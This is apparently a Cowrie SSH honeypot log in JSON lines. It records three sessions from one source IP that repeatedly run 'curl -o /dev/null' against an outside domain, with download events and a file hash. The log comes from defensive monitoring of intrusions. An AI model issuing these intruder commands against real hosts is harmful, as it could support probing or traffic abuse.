{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.112899Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.114936Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.117593Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.118393Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.121477Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.122517Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.125497Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.127517Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.128193Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.134049Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.165628Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.166336Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.168519Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.169229Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.171757Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.172400Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.174811Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.205819Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.206465Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.210269Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.212438Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.213042Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.214353Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.214902Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.218363Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.247030Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.247760Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.250802Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.254905Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.255460Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.259930Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.260450Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.294684Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.295361Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.298147Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.298725Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.301523Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.302499Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.307525Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.338366Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.338847Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.340487Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.341067Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.343889Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.348537Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.350566Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.351225Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.356554Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.390745Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.391397Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.396706Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.399848Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.401277Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.402075Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.403890Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.404949Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.410343Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.411846Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.438288Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.440780Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.442289Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.442818Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.445631Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.446024Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.447566Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.448093Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.479814Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.480392Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.484801Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.485278Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.490840Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.491376Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.519957Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.521929Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.524656Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.525636Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.526217Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.530431Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.531154Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.533151Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.533733Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.565358Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.565873Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.571360Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.572226Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:25.574210Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.575388Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:25.578477Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
